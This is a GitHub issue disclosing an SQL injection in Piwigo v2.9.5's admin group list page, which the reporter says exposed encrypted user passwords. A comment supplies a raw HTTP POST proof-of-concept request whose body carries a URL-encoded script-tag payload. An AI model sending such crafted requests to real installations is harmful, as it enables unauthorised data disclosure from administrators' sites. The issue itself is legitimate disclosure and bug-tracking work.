Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

SQL injection in group_list.php #1009

Closed
zongdeiqianxing opened this issue May 5, 2019 · 1 comment
Closed

SQL injection in group_list.php #1009

zongdeiqianxing opened this issue May 5, 2019 · 1 comment
Assignees
Milestone

Comments

@zongdeiqianxing
Copy link

An SQL injection has been discovered in the administration panel of Piwigo v2.9.5. The vulnerability allows remote attackers that are authenticated as administrator to inject SQL code into a query and display. This could result in full information disclosure.

The vulnerability was found in the 'delete' method in admin/group_list.php, because it does not validate and filter the '$group' parameter when it gets the parameters. And the vulnerability could query any data in the database and display it on the page.

In the figure, I obtained the encrypted password of the user table.
2
3

@zongdeiqianxing
Copy link
Author

POST /admin.php?page=group_list HTTP/1.1
Host: 10.150.10.186:30001
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: zh-CN,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://10.150.10.186:30001/admin.php?page=group_list
Content-Type: application/x-www-form-urlencoded
Content-Length: 430
Cookie: pwg_display_thumbnail=no_display_thumbnail; pwg_id=hb609s43hqj1iqrkvlrvgne5q7
Connection: close
Upgrade-Insecure-Requests: 1

pwg_token=036e74fc33b5eee65c74f44b98c09e13&group_selection%5B%5D=1&selectAction=delete&rename_1=1%3E%3Cscript%3Ealert%28%2Fgroup%2F%29%3C%2Fscript%3E&merge=%E5%9C%A8%E9%80%99%E8%BC%B8%E5%85%A5%E6%96%B0%E7%9A%84%E7%BE%A4%E7%B5%84%E5%88%A5%E5%90%8D%E7%A8%B1&confirm_deletion=1&duplicate_1=%E5%9C%A8%E9%80%99%E8%BC%B8%E5%85%A5%E6%96%B0%E7%9A%84%E7%BE%A4%E7%B5%84%E5%88%A5%E5%90%8D%E7%A8%B1&submit=%E6%87%89%E7%94%A8%E5%8B%95%E4%BD%9C

@plegall plegall added this to the 2.9.6 milestone May 31, 2019
@plegall plegall self-assigned this Aug 12, 2019
@plegall plegall changed the title Piwigo v2.9.5 - SQL injection in group_list.php SQL injection in group_list.php Aug 12, 2019
@plegall plegall modified the milestones: 2.9.6, 2.10.0RC1 Aug 12, 2019
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
Development

No branches or pull requests

2 participants